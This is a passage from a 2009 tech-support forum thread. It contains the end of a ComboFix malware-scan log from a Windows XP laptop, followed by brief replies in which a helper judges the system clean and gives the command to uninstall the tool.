  • 2009-03-21 . DA11D9D6ECBDF0F93436A4B7C13F7BEC . 991744 . . [5.1.2600.5781] . . c:\windows\$hf_mig$\KB959426\SP3QFE\kernel32.dll
[7] 2008-04-14 . C24B983D211C34DA8FCC1AC38477971D . 989696 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB959426$\kernel32.dll

  • 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\mswsock.dll
  • 2008-06-20 . 832E4DD8964AB7ACC880B2837CB1ED20 . 245248 . . [5.1.2600.5625] . . c:\windows\system32\dllcache\mswsock.dll
  • 2008-06-20 . FCEE5FCB99F7C724593365C706D28388 . 245248 . . [5.1.2600.5625] . . c:\windows\$hf_mig$\KB951748\SP3QFE\mswsock.dll
[7] 2008-04-14 . B4138E99236F0F57D4CF49BAE98A0746 . 245248 . . [5.1.2600.5512] . . c:\windows\$NtUninstallKB951748$\mswsock.dll
.
(((((((((((((((((((((((((((((  SnapShot@2009-09-21_08.47.27  )))))))))))))))))))))))))))))))))))))))))
.
+ 2009-03-27 20:10 . 2009-09-21 11:56    32768              c:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
- 2009-03-27 20:10 . 2009-09-21 07:16    32768              c:\windows\system32\config\systemprofile\Local Settings\Temporary Internet Files\Content.IE5\index.dat
+ 2009-03-27 20:10 . 2009-09-21 11:56    32768              c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
- 2009-03-27 20:10 . 2009-09-21 07:16    32768              c:\windows\system32\config\systemprofile\Local Settings\History\History.IE5\index.dat
+ 2009-09-20 12:46 . 2009-09-21 11:56    16384              c:\windows\system32\config\systemprofile\Cookies\index.dat
- 2009-09-20 12:46 . 2009-09-21 07:16    16384              c:\windows\system32\config\systemprofile\Cookies\index.dat
.
(((((((((((((((((((((((((((((((((((((  Reg Loading Points  ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4

[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2009-03-27 39408]
"MSMSGS"="c:\program files\Messenger\msmsgs.exe" [2008-04-14 1695232]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"SunJavaUpdateSched"="c:\program files\Java\jre6\bin\jusched.exe" [2009-07-09 148888]
"EDS"="c:\program files\Samsung\Samsung EDS\EDSAgent.exe" [2007-12-21 659456]
"Chrome3"="c:\program files\s3graphics\chrome3\Chrome3.exe" [2009-04-30 1274368]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2008-08-28 1044480]
"SUPBackGround"="c:\program files\Samsung\Samsung Update Plus\SUPBackGround.exe" [2008-12-04 298664]
"Adobe Reader Speed Launcher"="c:\program files\Adobe\Reader 9.0\Reader\Reader_sl.exe" [2008-06-12 34672]
"BatteryManager"="c:\program files\Samsung\Samsung Battery Manager\BatteryManager.exe" [2008-11-27 2768896]
"DMHotKey"="c:\program files\Samsung\Easy Display Manager\DMLoader.exe" [2006-12-27 466944]
"MagicKeyboard"="c:\program files\SAMSUNG\MagicKBD\PreMKBD.exe" [2006-05-15 151552]
"mcagent_exe"="c:\program files\McAfee.com\Agent\mcagent.exe" [2008-10-31 641208]
"UCam_Menu"="c:\program files\CyberLink\YouCam\MUITransfer\MUIStartMenu.exe" [2008-12-03 218408]
"QuickTime Task"="c:\program files\QuickTime\QTTask.exe" [2009-09-04 417792]
"iTunesHelper"="c:\program files\iTunes\iTunesHelper.exe" [2009-09-08 305440]
"Malwarebytes Anti-Malware (reboot)"="c:\program files\Malwarebytes' Anti-Malware\mbam.exe" [2009-09-10 1312080]
"RTHDCPL"="RTHDCPL.EXE" - c:\windows\RTHDCPL.EXE [2008-11-17 17676288]

[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run]
"CTFMON.EXE"="c:\windows\system32\CTFMON.EXE" [2008-04-14 15360]

c:\documents and settings\Yngve Ralph\Start Menu\Programs\Startup\
OpenOffice.org 3.1.lnk - c:\program files\OpenOffice.org 3\program\quickstart.exe [2009-4-16 384000]

c:\documents and settings\All Users\Start Menu\Programs\Startup\
Bluetooth.lnk - c:\program files\WIDCOMM\Bluetooth Software\BTTray.exe [2008-9-17 580200]

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\mcmscsvc]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MCODS]
@=""

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\Wdf01000.sys]
@="Driver"

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001

[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeFirewall]
"DisableMonitoring"=dword:00000001

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile]
"EnableFirewall"= 0 (0x0)

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\AuthorizedApplications\List]
"%windir%\\Network Diagnostic\\xpnetdiag.exe"=
"%windir%\\system32\\sessmgr.exe"=
"c:\\WINDOWS\\system32\\dpvsetup.exe"=
"c:\\Program Files\\Common Files\\McAfee\\MNA\\McNASvc.exe"=
"c:\\Program Files\\Bonjour\\mDNSResponder.exe"=
"c:\\Program Files\\Spotify\\spotify.exe"=
"c:\\Program Files\\iTunes\\iTunes.exe"=

[HKLM\~\services\sharedaccess\parameters\firewallpolicy\standardprofile\GloballyOpenPorts\List]
"8085:TCP"= 8085:TCP:ddnsfilter
"53:TCP"= 53:TCP:webserver

R2 DOSMEMIO;MEMIO;c:\windows\system32\MEMIO.SYS [2009-03-27 4300]
R2 McAfee SiteAdvisor Service;McAfee SiteAdvisor Service;c:\program files\McAfee\SiteAdvisor\McSACore.exe [2009-03-27 203280]
R2 S3Funkey;S3Funkey;c:\program files\s3graphics\chrome3\S3Funkey.svc [2009-04-30 444416]
R2 S3LoadSv;S3LoadSv;c:\program files\s3graphics\chrome3\s3loadsv.svc [2009-04-30 387072]
R2 yksvc;Marvell Yukon Service;RUNDLL32.EXE ykx32mpcoinst,serviceStartProc --> RUNDLL32.EXE ykx32mpcoinst,serviceStartProc [?]
R3 DNSeFilter;DNSeFilter;c:\windows\system32\drivers\SamsungEDS.SYS [2008-01-15 30208]
R3 S3GIGP;S3GIGP;c:\windows\system32\drivers\S3gIGPm.sys [2009-03-27 581632]
R3 vcrdrx32;VIA MSP Cardreader Host Controller;c:\windows\system32\drivers\vcrdrx32.sys [2009-03-27 90752]
R3 VMC326;Vimicro Camera Service VMC326;c:\windows\system32\drivers\VMC326.sys [2009-03-27 238464]
S1 Filter;Filter;\??\c:\windows\system32\drivers\Filter.sys --> c:\windows\system32\drivers\Filter.sys [?]
S2 DCSHost.exe;DCSHost.exe;c:\documents and settings\All Users\Application Data\DatacardService\DCSHOST.exe [2009-08-05 110592]
S3 hwusbfake;Huawei DataCard USB Fake;c:\windows\system32\drivers\ewusbfake.sys [2009-08-05 102656]

[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}]
"c:\windows\system32\rundll32.exe" "c:\windows\system32\iedkcs32.dll",BrandIEActiveSetup SIGNUP
.
Contents of the 'Scheduled Tasks' folder

2009-08-24 c:\windows\Tasks\AppleSoftwareUpdate.job
- c:\program files\Apple Software Update\SoftwareUpdate.exe [2008-07-30 10:34]

2009-03-27 c:\windows\Tasks\McDefragTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-03-27 c:\windows\Tasks\McQcTask.job
- c:\progra~1\mcafee\mqc\QcConsol.exe [2009-03-27 08:32]

2009-09-21 c:\windows\Tasks\User_Feed_Synchronization-{4C2CC653-8D8B-4747-B339-A00CA8CB617E}.job
- c:\windows\system32\msfeedssync.exe [2009-03-08 02:31]
.
.
------- Supplementary Scan -------
.
uStart Page = hxxp://www.google.com/ig/redirectdomain?brand=SMSN&bmod=SMSN
uInternet Settings,ProxyOverride = *.local
uSearchURL,(Default) = hxxp://www.google.com/search?q=%s
IE: Send to &Bluetooth Device... - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie_ctx.htm
IE: Send To Bluetooth - c:\program files\WIDCOMM\Bluetooth Software\btsendto_ie.htm
.

**************************************************************************

catchme 0.3.1398 W2K/XP/Vista - rootkit/stealth malware detector by Gmer, http://www.gmer.net
Rootkit scan 2009-09-21 15:32
Windows 5.1.2600 Service Pack 3 NTFS

scanning hidden processes ... 

scanning hidden autostart entries ...

scanning hidden files ... 

scan completed successfully
hidden files: 0

**************************************************************************

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3Funkey]
"ImagePath"="c:\program files\s3graphics\chrome3\s3funkey.svc"

[HKEY_LOCAL_MACHINE\System\ControlSet001\Services\S3LoadSv]
"ImagePath"="c:\program files\s3graphics\chrome3\s3loadsv.svc"
.
--------------------- LOCKED REGISTRY KEYS ---------------------

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}]
@Denied: (A 2) (Everyone)
@="FlashBroker"
"LocalizedString"="@c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe,-101"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\Elevation]
"Enabled"=dword:00000001

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\LocalServer32]
@="c:\\WINDOWS\\system32\\Macromed\\Flash\\FlashUtil10c.exe"

[HKEY_LOCAL_MACHINE\software\Classes\CLSID\{19114156-8E9A-4D4E-9EE9-17A0E48D3BBB}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}]
@Denied: (A 2) (Everyone)
@="IFlashBroker3"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\ProxyStubClsid32]
@="{00020424-0000-0000-C000-000000000046}"

[HKEY_LOCAL_MACHINE\software\Classes\Interface\{1D4C8A81-B7AC-460A-8C23-98713C41D6B3}\TypeLib]
@="{FAB3E735-69C7-453B-A446-B6823C6DF1C9}"
"Version"="1.0"
.
--------------------- DLLs Loaded Under Running Processes ---------------------

- - - - - - - > 'explorer.exe'(2196)
c:\windows\system32\WININET.dll
c:\program files\McAfee\SiteAdvisor\saHook.dll
c:\windows\system32\btmmhook.dll
c:\windows\system32\ieframe.dll
c:\windows\system32\webcheck.dll
c:\windows\system32\WPDShServiceObj.dll
c:\windows\system32\PortableDeviceTypes.dll
c:\windows\system32\PortableDeviceApi.dll
.
Completion time: 2009-09-21 15:34
ComboFix-quarantined-files.txt  2009-09-21 13:34
ComboFix2.txt  2009-09-20 12:05

Pre-Run: 61 115 314 176 bytes free
Post-Run: 61 103 661 056 bytes free

220    --- E O F ---    2009-09-21 07:09
f-arn (Guru)
20 September 2009 - 17:37 #29
That looks fine. Why don't you use Windows' automatic time setting?
sir_smokealot (Beginner)
20 September 2009 - 18:00 #30
I do now... many thanks for the help
sir_smokealot (Beginner)
20 September 2009 - 18:07 #31
f-arn, can you post an answer so you can get your well-deserved points.
f-arn (Guru)
20 September 2009 - 18:28 #32
An answer :)
f-arn (Guru)
21 September 2009 - 00:19 #33
Just one last thing. A bit of cleanup. Click Start, Run and paste the following in:
combofix /u